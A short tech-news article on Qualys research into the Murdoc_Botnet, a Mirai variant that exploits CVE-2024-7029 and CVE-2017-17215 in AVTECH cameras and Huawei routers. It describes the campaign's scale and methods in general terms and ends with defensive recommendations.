Researchers at cybersecurity software provider Qualys Inc. are warning of a new Mirai botnet variant that’s being used to target vulnerabilities in AVTECH Cameras and Huawei HG523 routers.

The variant, dubbed “Murdoc_Botnet,” was first detected in July and has already been found to have affected at least 1,300 devices globally, especially in Malaysia, Thailand, Mexico and Indonesia. Like all Mirai variants, the idea is to infect as many devices as possible to create new, extensive botnet networks.

The Qualys researchers found that Murdoc_Botnet employs a combination of ELF files and shell scripts to infiltrate devices. The scripts exploit vulnerabilities, such as CVE-2024-7029 and CVE-2017-17215, to deploy malware payloads and establish persistent connections with command-and-control servers.

The campaign’s infrastructure includes over 100 distinct command and control servers, with each responsible for managing and propagating malware to compromised devices. The servers communicate with infected devices to orchestrate activities such as payload execution, further infection and botnet expansion.

The Murdoc_Botnet favors internet of things devices, particularly targeting AVTECH cameras and Huawei routers. It targets those devices, knowing that they have existing vulnerabilities that are unlikely to be patched, ensuring a steady stream of new victims to enhance its network.

The malware spreads by executing bash scripts that fetch and execute payloads. The scripts are also designed to remove traces of their activity post-execution, making it harder for security tools to detect and mitigate the threat.

The Qualys researchers recommend that enterprise users and administrators make efforts to identify and protect against such attacks.

Recommended action includes regularly monitoring for suspicious processes, events and network traffic spawned by the execution of any untrusted binaries and scripts. Administrators and users should always be cautious in executing shell scripts from unknown or untrusted sources and admins should keep systems and firmware updated with the latest releases and patches.

Image: SiliconANGLE/Ideogram